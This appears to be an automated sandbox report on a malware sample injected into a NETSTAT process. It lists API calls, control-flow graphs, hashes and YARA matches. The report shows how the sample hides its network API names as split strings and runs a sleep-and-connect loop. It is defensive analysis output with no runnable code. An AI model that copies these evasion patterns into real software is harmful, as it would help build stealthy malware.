                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: c8d041ed6367203926c7ba366b0c22ea0082900ba74c2b88f34ed304c79fabd6
                                      • Instruction ID: 14ae5e9f8d97b3f837510c874d321e94ebc3934e7ad87ac8fce3f6922c2af8f8
                                      • Opcode Fuzzy Hash: c8d041ed6367203926c7ba366b0c22ea0082900ba74c2b88f34ed304c79fabd6
                                      • Instruction Fuzzy Hash: 2490027134100413D15261595905787000DDBD0282F91D422A0414558DD6969952F561
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 2b4afc0461439446211f25222ecdca5f51fb9549f1ca31d587bfa522077ebc00
                                      • Instruction ID: 8d5edd9fccc6cf517e7bdd4ab62ed4d955e7007a5e7341e8e6334966037cd015
                                      • Opcode Fuzzy Hash: 2b4afc0461439446211f25222ecdca5f51fb9549f1ca31d587bfa522077ebc00
                                      • Instruction Fuzzy Hash: 1A900261382041535586B1595805587400AEBE0282791D022A1404950CC566A856EA61
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 36e88bcdb36ccd14d7a516387dc3303a69be4726e56a41681a700da8eccd988a
                                      • Instruction ID: 4b7f88db6e0686d0e27d228a9ad73ee9dee6ad2f4d221c29b5754626dce4c01a
                                      • Opcode Fuzzy Hash: 36e88bcdb36ccd14d7a516387dc3303a69be4726e56a41681a700da8eccd988a
                                      • Instruction Fuzzy Hash: 599002A138100443D14161595815B870009DBE1342F51D025E1054554DC659DC52B566
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: fae320745db5253ba8ebea5f7ce6d2d8c65bd9119d42b31288078e8a8c149b7d
                                      • Instruction ID: fd7136d2799a56463fc2a00a7d448a6900ab86af035e8aa099a1ec497849337b
                                      • Opcode Fuzzy Hash: fae320745db5253ba8ebea5f7ce6d2d8c65bd9119d42b31288078e8a8c149b7d
                                      • Instruction Fuzzy Hash: 8B9002B134100403D181715958057C70009DBD0342F51D021A5054554EC6999DD5BAA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 5a81a2e97851ec224765e0cc3d4a099d466c6423528c0f6f708f5c8b3d2ce456
                                      • Instruction ID: 9c2ce07049d617255f1bdc1329eb890ddba09a15d06c98dfe42fc0c070127ee8
                                      • Opcode Fuzzy Hash: 5a81a2e97851ec224765e0cc3d4a099d466c6423528c0f6f708f5c8b3d2ce456
                                      • Instruction Fuzzy Hash: A690027134108803D151615998057CB0009DBD0342F55D421A4414658DC6D59891B561
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: f5dfc8621eede3e04f6496ce62de0211285b02509f0c1f8617c166190c2a68ec
                                      • Instruction ID: 4b0be6346786ea87d696e47662a3c44f798352b02bc521dc4a900b0427b53563
                                      • Opcode Fuzzy Hash: f5dfc8621eede3e04f6496ce62de0211285b02509f0c1f8617c166190c2a68ec
                                      • Instruction Fuzzy Hash: 9990027134100843D14161595805BC70009DBE0342F51D026A0114654DC655D851B961
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 4e1c0f5943538a60dfadbd798e515814ae371fbaa47ea61475f86312796461dc
                                      • Instruction ID: f43a4d610f8acd4a746f6ec64ebc0f00bab67073b94e9575a077cbe3244be6b1
                                      • Opcode Fuzzy Hash: 4e1c0f5943538a60dfadbd798e515814ae371fbaa47ea61475f86312796461dc
                                      • Instruction Fuzzy Hash: A790027134100803D1C1715958056CB0009DBD1342F91D025A0015654DCA559A59BBE1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 5124f7c8aac7ed0083c74281e6cb12b0a0863cf9618c3d1dacd4b64af8f19f38
                                      • Instruction ID: 1dfad89af4666fb47de61f7b8f9a4b956c1e010afcc9e01f07e32de15b749631
                                      • Opcode Fuzzy Hash: 5124f7c8aac7ed0083c74281e6cb12b0a0863cf9618c3d1dacd4b64af8f19f38
                                      • Instruction Fuzzy Hash: 3090027134504843D18171595805AC70019DBD0346F51D021A0054694DD6659D55FAA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: c038386db63bc537dabcba6fbc6b106408c77720cefc237346f0481f20a6b82b
                                      • Instruction ID: 4032c4ba0e7cbb5892dd97bd01c3b06bdf4e671a0858eb5b60b93b39e34755d9
                                      • Opcode Fuzzy Hash: c038386db63bc537dabcba6fbc6b106408c77720cefc237346f0481f20a6b82b
                                      • Instruction Fuzzy Hash: F490027135114403D151615998057870009DBD1242F51D421A0814558DC6D59891B562
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 109 2b08c75-2b08c76 110 2b08c78-2b08c7e 109->110 111 2b08c2f 109->111 113 2b08c96-2b08cb6 110->113 112 2b08c31-2b08c3f 111->112 111->113 114 2b08c4a-2b08c51 112->114 115 2b08c45 call 2b092a0 112->115 116 2b08cbf-2b08cc6 113->116 117 2b08cba call 2b092a0 113->117 118 2b08c53-2b08c6d InternetOpenA 114->118 119 2b08c6e-2b08c74 114->119 115->114 120 2b08cc8-2b08cee InternetConnectA 116->120 121 2b08cef-2b08cf5 116->121 117->116
                                      APIs
                                      • InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 02B08C67
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542587054.0000000002AF0000.00000040.00020000.sdmp, Offset: 02AF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2af0000_NETSTAT.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: InternetOpen
                                      • String ID: A$Conn$ConnectA$Inte$InternetConnectA$InternetOpenA$Open$ectA$rnet$rnet$rnetConnectA$rnetOpenA
                                      • API String ID: 2038078732-965392731
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 122 2b08d00-2b08d36 123 2b08d3f-2b08d46 122->123 124 2b08d3a call 2b092a0 122->124 125 2b08d48-2b08d6e HttpOpenRequestA 123->125 126 2b08d6f-2b08d75 123->126 124->123
                                      APIs
                                      • HttpOpenRequestA.WININET(RequestA,OpenRequestA,HttpOpenRequestA,00000000,?,?,?,?,?,?,?,00000000), ref: 02B08D68
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542587054.0000000002AF0000.00000040.00020000.sdmp, Offset: 02AF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2af0000_NETSTAT.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: HttpOpenRequest
                                      • String ID: Http$HttpOpenRequestA$HttpOpenRequestA$Open$OpenRequestA$Requ$RequestA$estA
                                      • API String ID: 1984915467-4016285707
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 127 2b08cf6-2b08d46 call 2b092a0 130 2b08d48-2b08d6e HttpOpenRequestA 127->130 131 2b08d6f-2b08d75 127->131
                                      APIs
                                      • HttpOpenRequestA.WININET(RequestA,OpenRequestA,HttpOpenRequestA,00000000,?,?,?,?,?,?,?,00000000), ref: 02B08D68
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542587054.0000000002AF0000.00000040.00020000.sdmp, Offset: 02AF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2af0000_NETSTAT.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: HttpOpenRequest
                                      • String ID: Http$HttpOpenRequestA$HttpOpenRequestA$Open$OpenRequestA$Requ$RequestA$estA
                                      • API String ID: 1984915467-4016285707
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 132 2b08c80-2b08cc6 call 2b092a0 135 2b08cc8-2b08cee InternetConnectA 132->135 136 2b08cef-2b08cf5 132->136
                                      APIs
                                      • InternetConnectA.WININET(ConnectA,rnetConnectA,InternetConnectA,00000000,?,?,?,?,?,?,?,00000000), ref: 02B08CE8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542587054.0000000002AF0000.00000040.00020000.sdmp, Offset: 02AF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2af0000_NETSTAT.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ConnectInternet
                                      • String ID: Conn$ConnectA$Inte$InternetConnectA$ectA$rnet$rnetConnectA
                                      • API String ID: 3050416762-1024195942
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 137 2b08c10-2b08c51 call 2b092a0 140 2b08c53-2b08c6d InternetOpenA 137->140 141 2b08c6e-2b08c74 137->141
                                      APIs
                                      • InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 02B08C67
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542587054.0000000002AF0000.00000040.00020000.sdmp, Offset: 02AF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2af0000_NETSTAT.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: InternetOpen
                                      • String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
                                      • API String ID: 2038078732-3155091674
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 142 2b08c08-2b08c3f 143 2b08c4a-2b08c51 142->143 144 2b08c45 call 2b092a0 142->144 145 2b08c53-2b08c6d InternetOpenA 143->145 146 2b08c6e-2b08c74 143->146 144->143
                                      APIs
                                      • InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 02B08C67
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542587054.0000000002AF0000.00000040.00020000.sdmp, Offset: 02AF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2af0000_NETSTAT.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: InternetOpen
                                      • String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
                                      • API String ID: 2038078732-3155091674
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 147 2b08e60-2b08ea9 call 2b092a0 150 2b08eb6-2b08ebc 147->150 151 2b08eab-2b08eb5 InternetCloseHandle 147->151
                                      APIs
                                      • InternetCloseHandle.WININET(CloseHandle,?,?,?,00000000), ref: 02B08EAF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542587054.0000000002AF0000.00000040.00020000.sdmp, Offset: 02AF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2af0000_NETSTAT.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandleInternet
                                      • String ID: Clos$CloseHandle$Inte$dle$eHan$rnet
                                      • API String ID: 1081599783-4067651292
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 152 2b08e58-2b08e96 153 2b08ea2-2b08ea9 152->153 154 2b08e9d call 2b092a0 152->154 155 2b08eb6-2b08ebc 153->155 156 2b08eab-2b08eb5 InternetCloseHandle 153->156 154->153
                                      APIs
                                      • InternetCloseHandle.WININET(CloseHandle,?,?,?,00000000), ref: 02B08EAF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542587054.0000000002AF0000.00000040.00020000.sdmp, Offset: 02AF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2af0000_NETSTAT.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandleInternet
                                      • String ID: Clos$CloseHandle$Inte$dle$eHan$rnet
                                      • API String ID: 1081599783-4067651292
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 347 2b07310-2b07352 call 2b0a030 350 2b07358-2b073a8 call 2b0a100 call 2af9b50 call 2b03e60 347->350 351 2b0742c-2b07432 347->351 359 2b073b0-2b073c1 Sleep 350->359 360 2b073c3-2b073c9 359->360 361 2b07426-2b0742a 359->361 362 2b073f3-2b07414 call 2b07140 360->362 363 2b073cb-2b073f1 call 2b06f40 360->363 361->351 361->359 367 2b07419-2b0741c 362->367 363->367 367->361
                                      APIs
                                      • Sleep.KERNELBASE(000007D0), ref: 02B073B8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542587054.0000000002AF0000.00000040.00020000.sdmp, Offset: 02AF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2af0000_NETSTAT.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Sleep
                                      • String ID: net.dll$wininet.dll
                                      • API String ID: 3472027048-1269752229
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 368 2b07306-2b07308 369 2b07377-2b073a8 call 2af9b50 call 2b03e60 368->369 370 2b0730a-2b0730e 368->370 381 2b073b0-2b073c1 Sleep 369->381 372 2b072a0-2b072a1 370->372 373 2b07310-2b07352 call 2b0a030 370->373 378 2b07358-2b07374 call 2b0a100 373->378 379 2b0742c-2b07432 373->379 378->369 383 2b073c3-2b073c9 381->383 384 2b07426-2b0742a 381->384 386 2b073f3-2b07414 call 2b07140 383->386 387 2b073cb-2b073f1 call 2b06f40 383->387 384->379 384->381 391 2b07419-2b0741c 386->391 387->391 391->384
                                      APIs
                                      • Sleep.KERNELBASE(000007D0), ref: 02B073B8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542587054.0000000002AF0000.00000040.00020000.sdmp, Offset: 02AF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2af0000_NETSTAT.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Sleep
                                      • String ID: net.dll$wininet.dll
                                      • API String ID: 3472027048-1269752229
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02AFCD00,?,?), ref: 02B0747C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542587054.0000000002AF0000.00000040.00020000.sdmp, Offset: 02AF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2af0000_NETSTAT.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateThread
                                      • String ID: net.dll
                                      • API String ID: 2422867632-2431746569
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02AF3B93), ref: 02B0892D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542587054.0000000002AF0000.00000040.00020000.sdmp, Offset: 02AF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2af0000_NETSTAT.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FreeHeap
                                      • String ID: .z`
                                      • API String ID: 3298025750-1441809116
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02AF3B93), ref: 02B0892D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542587054.0000000002AF0000.00000040.00020000.sdmp, Offset: 02AF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2af0000_NETSTAT.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FreeHeap
                                      • String ID: .z`
                                      • API String ID: 3298025750-1441809116
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02AF72EA
                                      • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02AF730B
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542587054.0000000002AF0000.00000040.00020000.sdmp, Offset: 02AF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2af0000_NETSTAT.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: MessagePostThread
                                      • String ID:
                                      • API String ID: 1836367815-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02AF72EA
                                      • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02AF730B
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542587054.0000000002AF0000.00000040.00020000.sdmp, Offset: 02AF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2af0000_NETSTAT.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: MessagePostThread
                                      • String ID:
                                      • API String ID: 1836367815-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02AF9BC2
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542587054.0000000002AF0000.00000040.00020000.sdmp, Offset: 02AF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2af0000_NETSTAT.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Load
                                      • String ID:
                                      • API String ID: 2234796835-0
                                      • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                      • Instruction ID: db695f4e92b2102adeada163bc9a906308e3c65f9f9d381e3b708a6f62f3f6f2
                                      • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                      • Instruction Fuzzy Hash: EC0112B5D0020DA7DB10DBE4DC81F9EB7799B54308F104595EA0897181FA75E718CB51
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • SetErrorMode.KERNELBASE(00008003,?,?,02AF7C93,?), ref: 02AFD46B
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542587054.0000000002AF0000.00000040.00020000.sdmp, Offset: 02AF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2af0000_NETSTAT.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorMode
                                      • String ID:
                                      • API String ID: 2340568224-0
                                      • Opcode ID: 3cba4c0a831f4059d8b87e6af8a02e23f8fda42de92d21b2cc7a222dc0181a5e
                                      • Instruction ID: e9b14dc00717510af7d07f2d588b9daa169ca5f833f31cb1f03092650fa9e884
                                      • Opcode Fuzzy Hash: 3cba4c0a831f4059d8b87e6af8a02e23f8fda42de92d21b2cc7a222dc0181a5e
                                      • Instruction Fuzzy Hash: 5701F971A14208BBDB14DFA8DC81FAEB799DB44750F1443A9F919D73C1DB38E6408650
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02B089C4
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542587054.0000000002AF0000.00000040.00020000.sdmp, Offset: 02AF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2af0000_NETSTAT.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateInternalProcess
                                      • String ID:
                                      • API String ID: 2186235152-0
                                      • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                      • Instruction ID: 04fc5c40ae66d2d6d3c1ee05b732bb538be3ff2a66a7a7877b067e55873974b1
                                      • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                      • Instruction Fuzzy Hash: 3501AFB2210108BBCB54DF89DC80EEB77ADAF8C754F158258BA0D97241C630EC51CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02B089C4
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542587054.0000000002AF0000.00000040.00020000.sdmp, Offset: 02AF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2af0000_NETSTAT.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateInternalProcess
                                      • String ID:
                                      • API String ID: 2186235152-0
                                      • Opcode ID: fbfca7d9fd0272c9df7e0791daf96dc817077bd846a138c9dc3b8160cc8d5037
                                      • Instruction ID: c78e41e586abb804c6604f158704104cfdcc1910261ea3128d621b251ad2d28b
                                      • Opcode Fuzzy Hash: fbfca7d9fd0272c9df7e0791daf96dc817077bd846a138c9dc3b8160cc8d5037
                                      • Instruction Fuzzy Hash: 3B01F6B6208148BFCB04CF9CDC90DEB7BA9AF8C310F158258FA5997242C630E841CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02AFCD00,?,?), ref: 02B0747C
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542587054.0000000002AF0000.00000040.00020000.sdmp, Offset: 02AF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2af0000_NETSTAT.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateThread
                                      • String ID:
                                      • API String ID: 2422867632-0
                                      • Opcode ID: 66f880b88237bb7f501d0255065ba32db4baa6cc8d92a9a3ead106e4e83ff01e
                                      • Instruction ID: b4839b95ec638f067a9ba9012823d048f54b19b45fa65b87e871cfe952c84275
